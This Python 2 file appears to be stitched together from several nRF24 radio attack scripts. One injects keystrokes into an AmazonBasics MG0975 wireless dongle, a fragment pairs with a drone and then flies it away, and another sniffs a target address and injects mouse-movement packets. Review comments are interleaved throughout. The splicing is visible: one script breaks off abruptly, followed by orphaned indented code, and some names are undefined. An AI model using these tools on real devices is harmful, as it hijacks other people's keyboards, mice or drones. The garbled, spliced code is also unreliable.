#!/usr/bin/env python2
'''
Author: xswxm
Blog: xswxm.com

Send payloads 1,2,3,4,5,6,7,8,9,0 to Amazonbasics MG0975 dongle continuously
e.g.: sudo python exp_attacker.py -l -a 61:8E:9C:CD:03 -f 74 -n 200

'''
import logging, time
from lib import common
# Register this script's options with the shared `common` argument parser and
# parse argv. `lib.common` is project-local; what init_args/parse_and_init do
# beyond populating `common.args` and `common.radio` is not visible here.
common.init_args('./exp_attacker.py')
common.parser.add_argument('-a', '--address', type=str, help='Address to sniff, following as it changes channels', required=True)
common.parser.add_argument('-f', '--channel', type=int, help='RF channel', default=0)
common.parser.add_argument('-n', '--times', type=int, help='Replay times', default=0)
common.parse_and_init()

# RF channel and replay count, taken from the parsed arguments as-is.
# NOTE(review): neither value is range-checked here; both default to 0, and
# how a replay count of 0 is treated lives in the part of the script not shown.
channel = common.args.channel
n = common.args.times

# 0x27 represents 'a' in this case
# NOTE(review): this keycode mapping is device-specific and not derivable from
# anything in this file; the header docstring talks about digit payloads — confirm.
p = 0x27

# Parse the prefix address: drop the ':' separators, hex-decode (Python 2
# str.decode('hex'), matching the python2 shebang), reverse to the byte order
# the radio expects and keep at most the first five bytes.
# NOTE(review): no minimum-length check is done here (nrf24-sniffer.py's main()
# rejects addresses shorter than 2 bytes); a non-hex or odd-length string is
# presumably rejected by decode('hex') itself rather than with a clear message.
address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
# Put the radio in sniffer mode (ESB w/o auto ACKs)
common.radio.enter_sniffer_mode(address)
# Set channel
# The radio is tuned once to the requested channel; this script does no channel
# following despite the '-a' help text, which was copied from the sniffer.
common.radio.set_channel(channel)

                    logging.debug('CRC Failure')
                    state = SEARCHING
                    continue

                # Pairing is complete
                elif rx_packet.aileron == 1:
                    time.sleep(0.25)
                    logging.debug('Paired')
                    state = PAIRED
                    break

    logging.info("Done Pairing")
    return vid


# Init command line args
# Init command line args
# Registers this script with the shared `common` parser and parses argv; no
# script-specific options are added, so only the common ones apply.
common.init_args('./fly-fly-away.py')
common.parse_and_init()

# Put the radio in promiscuous mode (generic)
# The 3-byte prefix '\x71\x0F\x55' and the RF_RATE_1M rate constant are passed
# straight through to the radio driver; their meaning is defined in lib.common,
# not here.
common.radio.enter_promiscuous_mode_generic('\x71\x0F\x55', common.RF_RATE_1M)

# Tune to 2402 MHz
# (channel 2; the channel-to-frequency mapping is done inside the radio driver)
common.radio.set_channel(2)

# Pair to a drone
# pair_drone() is presumably the function whose tail (`return vid`) appears
# above this block; `vid` is kept as a module-level global because
# fly_fly_away() takes it as its only argument.
vid = pair_drone()

# Fly, fly away!
fly_fly_away(vid)
def main():
    """Run the nRF24 sniffer/injector loop until ``running`` is cleared.

    Starts the mouse-file reader thread, registers and parses the command
    line, puts the radio in sniffer mode for the given address, then loops
    while the module-level ``running`` flag is true: re-pinging the target so
    the radio follows it across channels, transmitting one mouse payload per
    event queued on ``q``, and logging every payload received.

    Reads and writes the module globals ``x``, ``y`` and ``running`` (declared
    ``global`` below). Also relies on module-level ``q``, ``struct``,
    ``threading``, ``logging``, ``time``, ``common``, ``read_mouse_file`` and
    ``build_payload``, none of which are defined in this function.

    Raises:
        Exception: if the parsed address is shorter than 2 bytes.
    """
    global x, y, running

    # Background reader for mouse events. read_mouse_file is not visible here;
    # presumably it is what fills `q` with the 3-byte records consumed below.
    mouse_th = threading.Thread(target=read_mouse_file, args=())
    mouse_th.start()
    #  # Start keyboard listener
    #  listener = Listener(
    #        on_press=on_press,
    #        on_release=on_release)
    #
    #  listener.start()
    # NOTE(review): because the Listener block above is commented out, `listener`
    # is never assigned in this function, yet `listener.stop()` is called after
    # the loop. Unless a module-level `listener` exists, leaving the loop ends
    # with a NameError instead of a clean shutdown.
    # Keep alive payload 00:40:01:18:A7
    # Parse command line arguments and initialize the radio
    common.init_args('./nrf24-sniffer.py')
    common.parser.add_argument(
        '-a',
        '--address',
        type=str,
        help='Address to sniff, following as it changes channels',
        required=True)
    common.parser.add_argument('-t',
                               '--timeout',
                               type=float,
                               help='Channel timeout, in milliseconds',
                               default=100)
    common.parser.add_argument(
        '-k',
        '--ack_timeout',
        type=int,
        help='ACK timeout in microseconds, accepts [250,4000], step 250',
        default=250)
    # xrange (and str.decode('hex') below) mark this as Python 2 code.
    common.parser.add_argument('-r',
                               '--retries',
                               type=int,
                               help='Auto retry limit, accepts [0,15]',
                               default=1,
                               choices=xrange(0, 16),
                               metavar='RETRIES')
    common.parser.add_argument('-p',
                               '--ping_payload',
                               type=str,
                               help='Ping payload, ex 0F:0F:0F:0F',
                               default='00:40:01:18:A7',
                               metavar='PING_PAYLOAD')
    common.parse_and_init()

    # Parse the address
    # Strip ':' separators, hex-decode, reverse to the radio's byte order and
    # keep at most five bytes; address_string is the human-readable form used
    # in log lines. NOTE(review): the length check comes after decode('hex'),
    # so a non-hex or odd-length argument presumably fails inside decode with
    # a less specific error than the one raised here.
    address = common.args.address.replace(':', '').decode('hex')[::-1][:5]
    address_string = ':'.join('{:02X}'.format(ord(b)) for b in address[::-1])
    if len(address) < 2:
        raise Exception('Invalid address: {0}'.format(common.args.address))

    # Put the radio in sniffer mode (ESB w/o auto ACKs)
    common.radio.enter_sniffer_mode(address)

    # Convert channel timeout from milliseconds to seconds
    timeout = float(common.args.timeout) / float(1000)
    # Debug output of the raw ping payload argument.
    print('Payload')
    print(common.args.ping_payload)

    # Parse the ping payload
    ping_payload = common.args.ping_payload.replace(':', '').decode('hex')

    # Format the ACK timeout and auto retry values
    # The radio takes the ACK timeout as a 0-15 index in 250 us steps, so the
    # microsecond argument (250..4000 per the help text) maps to index
    # (us / 250) - 1; both values are clamped to the 4-bit range.
    ack_timeout = int(common.args.ack_timeout / 250) - 1
    ack_timeout = max(0, min(ack_timeout, 15))
    retries = max(0, min(common.args.retries, 15))

    # Sweep through the channels and decode ESB packets in pseudo-promiscuous mode
    # `running` is a module global; something outside this function must clear
    # it for the loop (and the script) to end.
    last_ping = time.time()
    channel_index = 0
    while running:

        # Follow the target device if it changes channels
        # Only re-ping once `timeout` seconds have passed without a received
        # packet (last_ping is also reset on every successful receive below).
        if time.time() - last_ping > timeout:

            # First try pinging on the active channel
            if not common.radio.transmit_payload(ping_payload, ack_timeout,
                                                 retries):

                # Ping failed on the active channel, so sweep through all available channels
                # channel_index is reused as the loop variable, so after the
                # sweep it names the channel the radio was last tuned to.
                success = False
                for channel_index in range(len(common.channels)):
                    common.radio.set_channel(common.channels[channel_index])
                    if common.radio.transmit_payload(ping_payload, ack_timeout,
                                                     retries):

                        # Ping successful, exit out of the ping sweep
                        last_ping = time.time()
                        logging.debug('Ping success on channel {0}'.format(
                            common.channels[channel_index]))
                        success = True
                        break

                # Ping sweep failed
                if not success:
                    logging.debug('Unable to ping {0}'.format(address_string))

            # Ping succeeded on the active channel
            else:
                # NOTE(review): before the first sweep channel_index is 0, which
                # only matches the real channel if enter_sniffer_mode tuned to
                # common.channels[0] — not verifiable from this file.
                logging.debug('Ping success on channel {0}'.format(
                    common.channels[channel_index]))
                last_ping = time.time()

        # Try to send mouse packets if arrow keys has been pressed
        #if x != 0 or y != 0:
        # Each queued record is three signed bytes; only the second and third
        # (taken as x/y deltas) are used, the first is ignored here.
        # build_payload is assumed to return a hex string, since the result is
        # passed through decode('hex') before transmission — confirm.
        if not q.empty():
            val = struct.unpack('3b', q.get())
            x = val[1]
            y = val[2]
            mouse_payload = build_payload(0, x, y, 0, 0)
            print(mouse_payload)
            common.radio.transmit_payload(mouse_payload.decode('hex'),
                                          ack_timeout, retries)

        # Receive payloads
        # receive_payload() returns a sequence whose first element is a status
        # byte (0 = a payload was received, per the split below).
        value = common.radio.receive_payload()
        if value[0] == 0:

            # Reset the channel timer
            last_ping = time.time()

            # Split the payload from the status byte
            payload = value[1:]

            # Log the packet
            # Columns: channel, payload length, target address, payload hex.
            logging.info('{0: >2}  {1: >2}  {2}  {3}'.format(
                common.channels[channel_index], len(payload), address_string,
                ':'.join('{:02X}'.format(b) for b in payload)))

        # End of main loop

    # NOTE(review): see the note by the commented-out Listener setup above —
    # `listener` is not assigned anywhere in this function. mouse_th is also
    # never joined, so the reader thread outlives this function.
    listener.stop()